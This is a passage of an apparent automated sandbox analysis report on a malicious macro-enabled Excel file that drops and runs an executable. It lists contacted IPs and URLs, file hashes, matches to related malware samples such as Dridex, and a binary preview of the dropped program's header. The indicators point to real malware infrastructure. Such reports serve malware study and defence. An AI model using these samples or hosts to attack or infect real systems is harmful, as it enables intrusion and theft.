                                                                                          http://www.rcsc.lt/repository0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://web.certicamara.com/marco-legal0Zfdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.quovadisglobal.com/cps0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.correo.com.uy/correocert/cps.pdf0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://graph.windows.net/06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                                                                high
                                                                                                https://devnull.onenote.com06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                                                                  high
                                                                                                  https://messaging.office.com/06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                                                                    high
                                                                                                    http://certs.oaticerts.com/repository/OATICA2.crt08fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://.jpgfdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    low
                                                                                                    http://cps.chambersign.org/cps/chambersignroot.html0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown

                                                                                                    Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    3.19.60.159
                                                                                                    unknownUnited States
                                                                                                    16509AMAZON-02USfalse
                                                                                                    3.14.70.198
                                                                                                    unknownUnited States
                                                                                                    16509AMAZON-02USfalse
                                                                                                    50.87.232.245
                                                                                                    unknownUnited States
                                                                                                    46606UNIFIEDLAYER-AS-1USfalse

                                                                                                    Private

                                                                                                    IP
                                                                                                    192.168.0.1

                                                                                                    General Information

                                                                                                    Joe Sandbox Version:31.0.0 Emerald
                                                                                                    Analysis ID:343657
                                                                                                    Start date:25.01.2021
                                                                                                    Start time:10:22:31
                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                    Overall analysis duration:0h 5m 53s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Sample file name:request_form_1611565093.xlsm
                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                    Number of analysed new started processes analysed:30
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • HDC enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Detection:MAL
                                                                                                    Classification:mal80.expl.evad.winXLSM@5/15@1/4
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    HDC Information:
                                                                                                    • Successful, ratio: 100% (good quality ratio 83.4%)
                                                                                                    • Quality average: 51.7%
                                                                                                    • Quality standard deviation: 35.1%
                                                                                                    HCA Information:Failed
                                                                                                    Cookbook Comments:
                                                                                                    • Adjust boot time
                                                                                                    • Enable AMSI
                                                                                                    • Found application associated with file extension: .xlsm
                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                    • Attach to Office via COM
                                                                                                    • Scroll down
                                                                                                    • Close Viewer
                                                                                                    Warnings:
                                                                                                    Show All
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 104.42.151.234, 104.43.139.144, 168.61.161.212, 52.109.32.63, 52.109.88.39, 52.109.88.37, 40.88.32.150, 92.122.144.200, 51.104.144.132, 92.122.213.194, 92.122.213.247, 93.184.221.240, 51.103.5.186, 40.126.31.137, 40.126.31.6, 40.126.31.8, 20.190.159.138, 20.190.159.132, 40.126.31.4, 40.126.31.135, 20.190.159.134, 51.11.168.160, 20.54.26.129, 92.122.145.220
                                                                                                    • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, wu.azureedge.net, www.tm.a.prd.aadg.trafficmanager.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, emea1.notify.windows.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, login.msa.msidentity.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net, dub2.next.a.prd.aadg.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    10:24:53API Interceptor1x Sleep call for process: fdcbn.exe modified

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                    50.87.232.245vbc.exeGet hashmaliciousBrowse
                                                                                                    • www.orderpak.com/o56q/?ndlpdH=XDZ5Ijx4JZ1SrhRhc7OpDm0ljaIYV1kCiBPJSVnLvpP9fswQcjoWjLKpxNZV8y0sc/oD&v48p-=1bjHLJKXgdz49L7p
                                                                                                    INVOICE3DDH.exeGet hashmaliciousBrowse
                                                                                                    • www.orderpak.com/o56q/?KX6x=XDZ5Ijx4JZ1SrhRhc7OpDm0ljaIYV1kCiBPJSVnLvpP9fswQcjoWjLKpxNVVvi4vFvoVg+00xA==&LlZ=blyxBdiX2XMl58
                                                                                                    PI.xlsxGet hashmaliciousBrowse
                                                                                                    • www.orderpak.com/o56q/?NN=XDZ5Ijx9Je1Wrxdte7OpDm0ljaIYV1kCiBXZOW7KrJP8fdcWbz5a1PyryrVT3DgnJZc05A==&nN6896=K0GdBjl8wRId

                                                                                                    Domains

                                                                                                    No context

                                                                                                    ASN

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                    AMAZON-02USdocuments_0084568546754.exeGet hashmaliciousBrowse
                                                                                                    • 99.83.185.45
                                                                                                    client.exeGet hashmaliciousBrowse
                                                                                                    • 52.216.129.123
                                                                                                    recteq_v1.6.3_apkpure.com.apkGet hashmaliciousBrowse
                                                                                                    • 3.23.213.135
                                                                                                    recteq_v1.6.3_apkpure.com.apkGet hashmaliciousBrowse
                                                                                                    • 3.23.213.135
                                                                                                    Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                                                    • 34.251.18.29
                                                                                                    beacon4.exeGet hashmaliciousBrowse
                                                                                                    • 13.35.43.85
                                                                                                    Payment _Arabian Parts Co BSC#U00a9.exeGet hashmaliciousBrowse
                                                                                                    • 13.248.196.204
                                                                                                    pan0ramic0.jpg.dllGet hashmaliciousBrowse
                                                                                                    • 143.204.214.141
                                                                                                    pan0ramic0.jpg.dllGet hashmaliciousBrowse
                                                                                                    • 13.224.195.167
                                                                                                    pan0ramic0.jpg.dllGet hashmaliciousBrowse
                                                                                                    • 143.204.214.142
                                                                                                    Jan_Order.htmlGet hashmaliciousBrowse
                                                                                                    • 52.218.240.96
                                                                                                    IFS_1.0.69.apkGet hashmaliciousBrowse
                                                                                                    • 13.224.94.101
                                                                                                    IFS_1.0.69.apkGet hashmaliciousBrowse
                                                                                                    • 52.216.251.116
                                                                                                    open_office_2877604939.exeGet hashmaliciousBrowse
                                                                                                    • 143.204.15.179
                                                                                                    KTFvWHZDMe.exeGet hashmaliciousBrowse
                                                                                                    • 3.137.48.156
                                                                                                    sLUAeV5Er6.exeGet hashmaliciousBrowse
                                                                                                    • 18.144.1.103
                                                                                                    GkrIJKmWHp.exeGet hashmaliciousBrowse
                                                                                                    • 3.131.104.217
                                                                                                    mtsWWNDaNF.exeGet hashmaliciousBrowse
                                                                                                    • 99.83.162.16
                                                                                                    NEW AGREEMENT 2021.xlsxGet hashmaliciousBrowse
                                                                                                    • 35.159.22.77
                                                                                                    Signatures Required 21-01-2021.xlsxGet hashmaliciousBrowse
                                                                                                    • 35.159.22.77
                                                                                                    UNIFIEDLAYER-AS-1USdocuments_0084568546754.exeGet hashmaliciousBrowse
                                                                                                    • 108.179.242.70
                                                                                                    mr kesh.exeGet hashmaliciousBrowse
                                                                                                    • 108.167.136.53
                                                                                                    79a2gzs3gkk.docGet hashmaliciousBrowse
                                                                                                    • 162.241.224.176
                                                                                                    INFO.docGet hashmaliciousBrowse
                                                                                                    • 162.241.224.176
                                                                                                    Electronic form.docGet hashmaliciousBrowse
                                                                                                    • 192.232.250.227
                                                                                                    file.docGet hashmaliciousBrowse
                                                                                                    • 162.241.253.129
                                                                                                    Payment_[Ref 72630 - joe.blow].htmlGet hashmaliciousBrowse
                                                                                                    • 50.87.150.0
                                                                                                    Payment _Arabian Parts Co BSC#U00a9.exeGet hashmaliciousBrowse
                                                                                                    • 74.220.199.6
                                                                                                    request_form_1611306935.xlsmGet hashmaliciousBrowse
                                                                                                    • 162.241.225.18
                                                                                                    file-2021-7_86628.docGet hashmaliciousBrowse
                                                                                                    • 162.241.253.129
                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.31734.dllGet hashmaliciousBrowse
                                                                                                    • 198.57.200.100
                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.12612.dllGet hashmaliciousBrowse
                                                                                                    • 198.57.200.100
                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.4639.dllGet hashmaliciousBrowse
                                                                                                    • 198.57.200.100
                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.24961.dllGet hashmaliciousBrowse
                                                                                                    • 198.57.200.100
                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.6647.dllGet hashmaliciousBrowse
                                                                                                    • 198.57.200.100
                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.4309.dllGet hashmaliciousBrowse
                                                                                                    • 198.57.200.100
                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.30163.dllGet hashmaliciousBrowse
                                                                                                    • 198.57.200.100
                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.17436.dllGet hashmaliciousBrowse
                                                                                                    • 198.57.200.100
                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.15942.dllGet hashmaliciousBrowse
                                                                                                    • 198.57.200.100
                                                                                                    SecuriteInfo.com.Trojan.Dridex.735.27526.dllGet hashmaliciousBrowse
                                                                                                    • 198.57.200.100
                                                                                                    AMAZON-02USdocuments_0084568546754.exeGet hashmaliciousBrowse
                                                                                                    • 99.83.185.45
                                                                                                    client.exeGet hashmaliciousBrowse
                                                                                                    • 52.216.129.123
                                                                                                    recteq_v1.6.3_apkpure.com.apkGet hashmaliciousBrowse
                                                                                                    • 3.23.213.135
                                                                                                    recteq_v1.6.3_apkpure.com.apkGet hashmaliciousBrowse
                                                                                                    • 3.23.213.135
                                                                                                    Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                                                    • 34.251.18.29
                                                                                                    beacon4.exeGet hashmaliciousBrowse
                                                                                                    • 13.35.43.85
                                                                                                    Payment _Arabian Parts Co BSC#U00a9.exeGet hashmaliciousBrowse
                                                                                                    • 13.248.196.204
                                                                                                    pan0ramic0.jpg.dllGet hashmaliciousBrowse
                                                                                                    • 143.204.214.141
                                                                                                    pan0ramic0.jpg.dllGet hashmaliciousBrowse
                                                                                                    • 13.224.195.167
                                                                                                    pan0ramic0.jpg.dllGet hashmaliciousBrowse
                                                                                                    • 143.204.214.142
                                                                                                    Jan_Order.htmlGet hashmaliciousBrowse
                                                                                                    • 52.218.240.96
                                                                                                    IFS_1.0.69.apkGet hashmaliciousBrowse
                                                                                                    • 13.224.94.101
                                                                                                    IFS_1.0.69.apkGet hashmaliciousBrowse
                                                                                                    • 52.216.251.116
                                                                                                    open_office_2877604939.exeGet hashmaliciousBrowse
                                                                                                    • 143.204.15.179
                                                                                                    KTFvWHZDMe.exeGet hashmaliciousBrowse
                                                                                                    • 3.137.48.156
                                                                                                    sLUAeV5Er6.exeGet hashmaliciousBrowse
                                                                                                    • 18.144.1.103
                                                                                                    GkrIJKmWHp.exeGet hashmaliciousBrowse
                                                                                                    • 3.131.104.217
                                                                                                    mtsWWNDaNF.exeGet hashmaliciousBrowse
                                                                                                    • 99.83.162.16
                                                                                                    NEW AGREEMENT 2021.xlsxGet hashmaliciousBrowse
                                                                                                    • 35.159.22.77
                                                                                                    Signatures Required 21-01-2021.xlsxGet hashmaliciousBrowse
                                                                                                    • 35.159.22.77

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                    37f463bf4616ecd445d4a1937da06e19creoagent.dllGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    creoagent.dllGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    case (426).xlsGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    case (250).xlsGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    rvYr7FRwkG.dllGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    case (1447).xlsGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    case (850).xlsGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    SecuriteInfo.com.Heur.18472.xlsGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    case (1543).xlsGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    SecuriteInfo.com.FileRepMalware.dllGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    case_1581.xlsGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    case (435).xlsGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    case (426).xlsGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    case (61).xlsGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    BENVAV31BU.htmlGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    IRS_Covid_19_Relief_Grant_Document_docx.exeGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    Vivaldi.3.5.2115.87.x64.exeGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    8776139.docmGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245
                                                                                                    TeamViewer 14.exeGet hashmaliciousBrowse
                                                                                                    • 50.87.232.245

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24
                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):132942
                                                                                                    Entropy (8bit):5.372914488710379
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:JcQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:JrQ9DQW+zBX8P
                                                                                                    MD5:44355DEB0C1B73C85437AB6568BE399B
                                                                                                    SHA1:C3605F95A21EE0FC423D0CA88DBB1C673BAF3815
                                                                                                    SHA-256:83197247F581FA83C9A6ACCF821675A6848684EC8E97D9CE127C3E677F73A11C
                                                                                                    SHA-512:9CED4912422512B5CF0FFF78F7CA4BF8A00C72A0B287387878EF9E3CB21E1BA0340B096ACF1F280CF1D61944155F9AB8590508859DD2A41C39DDB68351AFCC32
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-25T09:23:29">.. Build: 16.0.13720.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\13B79D28.png
                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                    File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1028
                                                                                                    Entropy (8bit):7.761039651897249
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA
                                                                                                    MD5:600F503BC1066BEB5FB5DD494AA1CD74
                                                                                                    SHA1:A504D5E687B98F9E0FD2896DFC8492DE0F974BE6
                                                                                                    SHA-256:B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
                                                                                                    SHA-512:B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x....IDATHK..YL.Q......Vl.P. .qC.(....(.".-..q....%1.q./F.Q.L\./4.KlX.Q...EE..(. ..V.i;.z...h..7.0........(...|s.k.J.Mm].J|.3........W.&EE..s.hS.}.....%^x`s....s..Rb..9....jw...o.e..17=:!&..X.Q._.!. |....N$.L.1.N..}.k..v..2.piZ..A.,.l.w......I.{...p...C[......'.........b....:f.\?!3MK........Cb..B.....%`?1..Y>9\....P.......z..uK...g.V.P.U.3...L.j.?(.g.....}.=.}......L.B.{...i.!..-q....9(=%^......&.q.j..>.q...w.NO.@.D..jmnL...U.R0B=6...U....P}Koh.D@"...]9...r,. .."2.......[.~ .......... .ay....nCm'...(..$......_4....*gNT..02h...zT.b.hhF..E.l.Z..J8.....=..H.{....Q...hg.g...u_!...T7./..+...u.....m...C]..E-..ki.CS..2.V..v>.?..$d..U.o.o...w........."....7..g...O]...U`..........g..A.j.....b...\.s(I.......@._B....i..2.I..7W.6....`..!r].P.......^.8n ..X...+3...F.....!x...H..fkYu....y.l...(../.y....,;~qV.R!#C.q...yoE..{O:...R.......c...Z;..[.x.....#N...'....M..@...n0..nD..!..p.!J....
                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5051E8F4.png
                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                    File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):677
                                                                                                    Entropy (8bit):7.433026174405032
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6
                                                                                                    MD5:55E8A29B221E51BE421B7D4F5F5F7E52
                                                                                                    SHA1:117E73181FC9CDAA0904C6372D68EE48CEDC14E4
                                                                                                    SHA-256:B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
                                                                                                    SHA-512:8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x...JIDATHKc...?...g..l.;k...FF...@H..jb`d..?-P'.SYA......f.........'.?............{K.a..:..W..s.~.....{.....<.....9.......[.=\{.._FN^._{'{3VM?.p..v._....v..;..s...O.....*.|........yaz....!/...........o..xZ.Sn...O+YP.122.....33.A..3.?.DR...+.F...o.M_..h.W...}..K?.........*....z..K...........F?..{............|..`!l*X...E.....$.......3... ..0....+.r.D.D7e.&.b...t...../..o.I2.p...yl.J|.Y0j4Z....!.s#;.XW.gbd`.bb........X..ue...'fi..[1..!.@.......s.:(..e`}.. ...-...1.. J..(`..,}.X...H.>".m?..h .X.D.5Ff......y"4.P.4d...@.A..8.[?..7q....I.*.M..[.>\{....j..Y3...3.5'......op.....IEND.B`.
                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\76CE0C65.png
                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                    File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1028
                                                                                                    Entropy (8bit):7.761039651897249
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA
                                                                                                    MD5:600F503BC1066BEB5FB5DD494AA1CD74
                                                                                                    SHA1:A504D5E687B98F9E0FD2896DFC8492DE0F974BE6
                                                                                                    SHA-256:B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
                                                                                                    SHA-512:B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x....IDATHK..YL.Q......Vl.P. .qC.(....(.".-..q....%1.q./F.Q.L\./4.KlX.Q...EE..(. ..V.i;.z...h..7.0........(...|s.k.J.Mm].J|.3........W.&EE..s.hS.}.....%^x`s....s..Rb..9....jw...o.e..17=:!&..X.Q._.!. |....N$.L.1.N..}.k..v..2.piZ..A.,.l.w......I.{...p...C[......'.........b....:f.\?!3MK........Cb..B.....%`?1..Y>9\....P.......z..uK...g.V.P.U.3...L.j.?(.g.....}.=.}......L.B.{...i.!..-q....9(=%^......&.q.j..>.q...w.NO.@.D..jmnL...U.R0B=6...U....P}Koh.D@"...]9...r,. .."2.......[.~ .......... .ay....nCm'...(..$......_4....*gNT..02h...zT.b.hhF..E.l.Z..J8.....=..H.{....Q...hg.g...u_!...T7./..+...u.....m...C]..E-..ki.CS..2.V..v>.?..$d..U.o.o...w........."....7..g...O]...U`..........g..A.j.....b...\.s(I.......@._B....i..2.I..7W.6....`..!r].P.......^.8n ..X...+3...F.....!x...H..fkYu....y.l...(../.y....,;~qV.R!#C.q...yoE..{O:...R.......c...Z;..[.x.....#N...'....M..@...n0..nD..!..p.!J....
                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7E715703.png
                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                    File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):677
                                                                                                    Entropy (8bit):7.433026174405032
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6
                                                                                                    MD5:55E8A29B221E51BE421B7D4F5F5F7E52
                                                                                                    SHA1:117E73181FC9CDAA0904C6372D68EE48CEDC14E4
                                                                                                    SHA-256:B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
                                                                                                    SHA-512:8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x...JIDATHKc...?...g..l.;k...FF...@H..jb`d..?-P'.SYA......f.........'.?............{K.a..:..W..s.~.....{.....<.....9.......[.=\{.._FN^._{'{3VM?.p..v._....v..;..s...O.....*.|........yaz....!/...........o..xZ.Sn...O+YP.122.....33.A..3.?.DR...+.F...o.M_..h.W...}..K?.........*....z..K...........F?..{............|..`!l*X...E.....$.......3... ..0....+.r.D.D7e.&.b...t...../..o.I2.p...yl.J|.Y0j4Z....!.s#;.XW.gbd`.bb........X..ue...'fi..[1..!.@.......s.:(..e`}.. ...-...1.. J..(`..,}.X...H.>".m?..h .X.D.5Ff......y"4.P.4d...@.A..8.[?..7q....I.*.M..[.>\{....j..Y3...3.5'......op.....IEND.B`.
                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\30ght3erd[1].exe
                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):742003
                                                                                                    Entropy (8bit):4.747274159794167
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:Gb6aZQWqNNmRTKHkZnmHgl1gW9oLeN53f9Pa3JLkK9BOsJ:Gb6afqNNmRnZn79oKpCZL99h
                                                                                                    MD5:DC74FAE0ADA0A2426E77588E3797E040
                                                                                                    SHA1:956EB4FACF7A5BD5E35CFE97898B1D17FEC2643D
                                                                                                    SHA-256:C9AF52899F8EE20E384DE482B81CE82826AF9573C4A1A9C9B761B9C5126B2BB7
                                                                                                    SHA-512:6C4A2786E391D3B23495D2159C56D4C8A49EAC0D18F1FAF4820A1D4CF9C93A5DFEE01DE0D0FE5D9D302F8527061B55B34D650AD3C4704CD98D9962BA3E9603E2
                                                                                                    Malicious:true
                                                                                                    Reputation:low
                                                                                                    Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...<..`.........."..................8.........@............................. ............`.................................................8Y..(............... ....9..h.......@....X..................................0...........p[...............................text............................... ..`.rdata..4...........................@..@.data...`6...........h..............@....pdata.. ............t..............@..@.00cfg..(...........................@..@.gehcont............................@..@_RDATA..............................@..@.reloc..@...........................@..B.................~....}.}~.x}..x.x.~}~.~....x.~..x.~.~}x...x...x.x..x.~..w..~...........}.}.}.}...}...}..x..}..~.~.....}x....x.....}.......}.}x.~...~.~...~.}.......}..~.~x......}..}..x.~....x.....x..x.}......}........x.}.}~....~.....}.....~}~...........~..
